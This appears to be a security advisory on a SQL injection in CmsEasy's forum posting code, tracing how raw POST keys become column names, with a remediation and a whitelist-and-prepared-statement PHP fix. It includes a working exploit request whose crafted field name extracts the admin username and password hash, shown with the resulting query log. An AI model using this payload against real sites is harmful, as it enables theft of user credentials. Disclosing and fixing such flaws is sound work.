Cmseasy SQL injection vulnerability 3 and repair
Injection:
When an article is posted in the bbs module, the $_POST array is passed straight into the SQL-building functions, which results in injection.
/bbs/add-archive.php, line 30:
if ($id = $archive->inserData($_POST)) {
The entire $_POST array is passed in unchanged.
/bbs/model/db/base.php, line 38:
public function inserData($data) {
    $r = $this->odb->insert($this->tblName, $data); // the whole $_POST array goes on to the DB layer
    if ($r) return $this->odb->getInsertId();
    else return false;
}
/bbs/commonlib/db.php:
public function insert($table, $data) {
    $sql = $this->getInsertString($table, $data); // concatenates the SQL statement, see below
    return $this->execSql($sql);
}
public function getInsertString($table, $data) {
    $n_str = '';
    $v_str = '';
    $table = $this->filterString($table);
    foreach ($data as $k => $v) { // walks $data; since the whole $_POST was passed through, both column names and values are attacker-controlled
        $n_str .= $this->filterString($k) . ',';
        $v_str .= "'" . $this->filterString($v) . "',";
    }
    $n_str = preg_replace("/,$/", "", $n_str);
    $v_str = preg_replace("/,$/", "", $v_str);
    $str = 'INSERT INTO ' . $table . ' (' . $n_str . ') VALUES (' . $v_str . ')';
    return $str;
}
public function filterString($str) {
    if ($this->magic_quotes) {
        $str = stripslashes($str);
    }
    if (is_numeric($str)) {
        return $str;
    } else {
        $ret = @mysqli_real_escape_string($this->con, $str);
        if (strlen($str) && !isset($ret)) {
            $r = $this->checkConnection();
            if ($r !== true) {
                $this->closeDB();
                $ret = $str; // falls back to the raw string when no connection is available
            }
        }
        return $ret;
    }
}
The filtering does not help here: filterString() only escapes quote characters, and a payload carried in a key name (the column list) needs none, so it is concatenated into the statement unchanged.
There is also a 360safe.php script in the installation, but it only filters key values, not key names.
PHP also converts dots and spaces in request variable names into underscores, but the payload can be written without spaces.
Exp:
http://FIG/PHP/CmsEasy/bbs/add-archive.php?cid=1
(POST)
title=a&content)values(1,(SELECT(CONCAT(USERNAME,0x7c,PASSWORD)FROM(cmseasy_user)WHERE(USERID%3D1)))#=c&submit=a&verify=HKCX
MySQL log:
2070 Query    INSERT INTO cmseasy_bbs_archive (title, content) values (1, (SELECT (CONCAT (USERNAME, 0x7c, PASSWORD) FROM (cmseasy_user) WHERE (USERID = 1 )))#, username, userid, ip, addtime) VALUES ('A', 'C', '123', '4', '123. 0.0.1 ', '123 ')
Solution:
Do not hand the raw $_POST array to inserData(). Build the $data array from a fixed list of the expected form fields (title, content) before passing it on, so that request keys never become column names, and keep the values out of the statement text by using bound parameters.
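As an added example (not CmsEasy's own code), the following shows what the fix above looks like when written out: column names come only from a fixed whitelist, identifiers are validated and quoted, and values are bound as prepared-statement parameters instead of being concatenated. The table name cmseasy_bbs_archive and the form fields title and content are taken from the log above; the hostile request key is a constructed, harmless stand-in for the one in the advisory, and the mysqli connection at the end is assumed.

```php
<?php
// Added example, not CmsEasy code: whitelist-based replacement for the
// pattern $archive->inserData($_POST) shown above.

/** Form fields the bbs archive form may set (assumed from the log above). */
const ARCHIVE_COLUMNS = ['title', 'content'];

/**
 * Builds a parameterised INSERT for $table from $input, keeping only the
 * keys listed in $allowed. Returns [sql, values]; throws on bad input.
 */
function buildInsert(string $table, array $input, array $allowed): array
{
    $identifier = '/^[A-Za-z_][A-Za-z0-9_]*$/';
    if (!preg_match($identifier, $table)) {
        throw new InvalidArgumentException('bad table name');
    }
    $columns = [];
    $values = [];
    foreach ($allowed as $column) {
        // Only whitelisted names are ever looked up: a request key such as
        // "content) values (1,(SELECT 1))#" is never consulted at all.
        if (!array_key_exists($column, $input)) {
            continue;
        }
        if (!is_scalar($input[$column])) {
            // title[]=x would arrive as an array; refuse rather than cast to "Array".
            throw new InvalidArgumentException("field $column must be a scalar");
        }
        $columns[] = '`' . $column . '`';
        $values[] = (string) $input[$column];
    }
    if ($columns === []) {
        throw new InvalidArgumentException('no permitted columns supplied');
    }
    $placeholders = implode(', ', array_fill(0, count($columns), '?'));
    $sql = 'INSERT INTO `' . $table . '` (' . implode(', ', $columns)
         . ') VALUES (' . $placeholders . ')';
    return [$sql, $values];
}

/** Request keys that were not on the whitelist, useful for logging or alerting. */
function rejectedKeys(array $input, array $allowed): array
{
    return array_values(array_diff(array_keys($input), $allowed));
}

// Constructed request in the shape of the POST body quoted above; the
// injected key is a harmless placeholder, not the advisory's payload.
$hostilePost = [
    'title'                            => 'a',
    'content) values (1,(SELECT 1))#'  => 'c',
    'submit'                           => 'a',
    'verify'                           => 'HKCX',
];

[$sql, $params] = buildInsert('cmseasy_bbs_archive', $hostilePost, ARCHIVE_COLUMNS);
echo $sql, PHP_EOL;   // INSERT INTO `cmseasy_bbs_archive` (`title`) VALUES (?)
print_r(rejectedKeys($hostilePost, ARCHIVE_COLUMNS)); // the injected key, submit, verify

// Execution with mysqli ($con is an assumed open connection):
// $stmt = $con->prepare($sql);
// $stmt->bind_param(str_repeat('s', count($params)), ...$params);
// $stmt->execute();
```

Because the column list is driven by ARCHIVE_COLUMNS rather than by the request, an unexpected key cannot reach the statement text; rejectedKeys() makes such requests visible in logs, which is also a cheap detection for probing of this endpoint.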